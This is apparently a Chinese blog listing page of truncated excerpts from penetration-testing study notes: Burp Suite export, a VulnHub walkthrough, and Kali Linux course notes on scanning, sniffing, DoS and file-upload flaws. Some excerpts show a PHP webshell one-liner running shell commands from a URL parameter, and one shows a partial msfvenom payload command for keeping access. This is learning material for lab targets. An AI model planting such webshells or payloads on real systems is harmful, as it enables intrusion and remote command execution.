使用的版本为 burpsuite_pro_v2020.6.jarBurpSuite 的导入和导出2020年7月12日10:54:51【原创】1. 简介主要目的是使用burp记录浏览记录，并保存成文件2. 导出导出整个项目成 .burp 文件位置：Project -> Save copy优点：跨平台分享项目中所有浏览记录测试：二进制文件先尽情的抓包，然后保存即可，可以只选择保存 Proxy的内

本文主要记录对 Lazysysadmin 的渗透学习过程，测试的 VM 主机主要来源 www.vulnhub.comDerpNStink下载链接初始安装的虚拟机是不知道IP的，首先需要信息收集发现IP，这里使用 netdiscover在这里插入代码片使用 nmap 进行端口探测Starting Nmap 7.70 ( https://nmap.org ) at 2019...

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程httrack 爬取整站

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程arachni 简介安装升级 arachni开始扫描功能选项预配置文件

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. 密码嗅探1. 简介二、三层地址IP 网络到网络MAC 主机到主机交换机与HUBHUB全端口转发交换机根据学习地址转发混杂模式抓包ARP协议免费ARP基于广播学习以太网头、ARP头请求、

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. 简介应用服务漏洞服务代码存在漏洞，遇异常提交数据时程序崩溃应用处理大量并发请求能力有限，被拒绝的是应用或OS缓冲区溢出漏洞向目标函数随机提交数据，特定情况下数据覆盖临近寄存器或内存影响: 远程代

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. 文件上传漏洞php 代码<?php echo shell_exec($_GET['cmd']);?>直接上传 webshell修改文件类型上传 webshellmimetype文件头、扩展名修

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. Webshell 演示在被攻击者新建 webshell 文件root@metasploitable:/var/www# cat test.php<?php echo shell_exec($_GE

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. 准备工作已经获得目标系统控制权后扩大战果提权信息收集渗透内网永久后门基于已有 session 扩大战果msfvenom -a x86 –platform windows -p windows/

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程，教程为安全牛课堂里的《Kali Linux 渗透测试》课程Kali Linux渗透测试（苑房弘）博客记录1. 简介主要针对早期微软操作系统（95、98、3.x、nt）近些年有人发现对 2.x 版本的安卓系统、6.0 IOS 系统攻击有效原理很有趣使用 IP 分段便宜实现分段覆盖，接收端处理分段覆盖时可被